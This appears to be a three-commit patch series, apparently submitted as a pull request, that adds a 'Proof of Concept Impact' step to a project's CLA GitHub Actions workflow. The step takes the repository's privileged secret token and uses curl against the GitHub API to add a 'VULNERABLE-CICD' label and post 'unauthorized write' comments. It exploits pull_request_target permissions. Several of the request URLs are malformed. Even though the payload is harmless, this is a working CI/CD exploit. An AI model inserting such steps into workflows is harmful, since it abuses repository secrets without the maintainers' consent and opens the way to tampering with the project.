From ebfd06ffb745a65eecaaf3174835e93bba17bbc6 Mon Sep 17 00:00:00 2001
From: killsh <killsh@gmail.com>
Date: Fri, 1 May 2026 17:33:26 +0700
Subject: [PATCH 1/3] poc: demonstrate unauthorized label creation via actions
 write

---
 .github/workflows/cla.yaml | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index bc975ea..319e2e7 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -33,3 +33,13 @@ jobs:
         with:
           github-token: ${{ secrets.token }}
           cla-token: ${{ secrets.cla-token }}
+      - name: Proof of Concept Impact
+        env:
+          GITHUB_TOKEN: ${{ secrets.token }}
+        run: |
+          curl -X POST \
+          -H "Authorization: Bearer $GITHUB_TOKEN" \
+          -H "Accept: application/vnd.github+json" \
+          https://github.com{{ github.event.pull_request.number }}/labels \
+          -d '{"labels":["VULNERABLE-CICD"]}'
+

From 7e3789d59f02c1e1a8677548f0b2419c76b9db06 Mon Sep 17 00:00:00 2001
From: killsh <killsh@gmail.com>
Date: Fri, 1 May 2026 17:52:06 +0700
Subject: [PATCH 2/3] poc: verify pull_request_target with actions write

---
 .github/workflows/cla.yaml | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index 319e2e7..93fbeeb 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -35,11 +35,12 @@ jobs:
           cla-token: ${{ secrets.cla-token }}
       - name: Proof of Concept Impact
         env:
-          GITHUB_TOKEN: ${{ secrets.token }}
+          # Đây là khai báo để Runner của GitHub tự bốc Token dán vào
+          GITHUB_TOKEN: ${{ secrets.token }} 
         run: |
-          curl -X POST \
+          curl -L -X POST \
           -H "Authorization: Bearer $GITHUB_TOKEN" \
           -H "Accept: application/vnd.github+json" \
-          https://github.com{{ github.event.pull_request.number }}/labels \
-          -d '{"labels":["VULNERABLE-CICD"]}'
+          "https://github.com{{ github.event.pull_request.number }}/comments" \
+          -d '{"body":"POC SUCCESS: Unauthorized Comment via Actions Write"}'
 

From f288d51d5e4ccd7a157b66c31f5f45cf3a7fab43 Mon Sep 17 00:00:00 2001
From: killsh <killsh@gmail.com>
Date: Fri, 1 May 2026 17:57:05 +0700
Subject: [PATCH 3/3] poc: verify pull_request_target with actions write

---
 .github/workflows/cla.yaml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/.github/workflows/cla.yaml b/.github/workflows/cla.yaml
index 93fbeeb..3bf3a2e 100644
--- a/.github/workflows/cla.yaml
+++ b/.github/workflows/cla.yaml
@@ -35,12 +35,12 @@ jobs:
           cla-token: ${{ secrets.cla-token }}
       - name: Proof of Concept Impact
         env:
-          # Đây là khai báo để Runner của GitHub tự bốc Token dán vào
-          GITHUB_TOKEN: ${{ secrets.token }} 
+          # Phải dùng đúng tên 'secrets.token' như Shopify đã định nghĩa
+          GH_TOKEN: ${{ secrets.token }}
         run: |
           curl -L -X POST \
-          -H "Authorization: Bearer $GITHUB_TOKEN" \
+          -H "Authorization: Bearer $GH_TOKEN" \
           -H "Accept: application/vnd.github+json" \
           "https://github.com{{ github.event.pull_request.number }}/comments" \
-          -d '{"body":"POC SUCCESS: Unauthorized Comment via Actions Write"}'
+          -d '{"body":"[VULNERABILITY CONFIRMED]: Unauthorized write access via pull_request_target."}'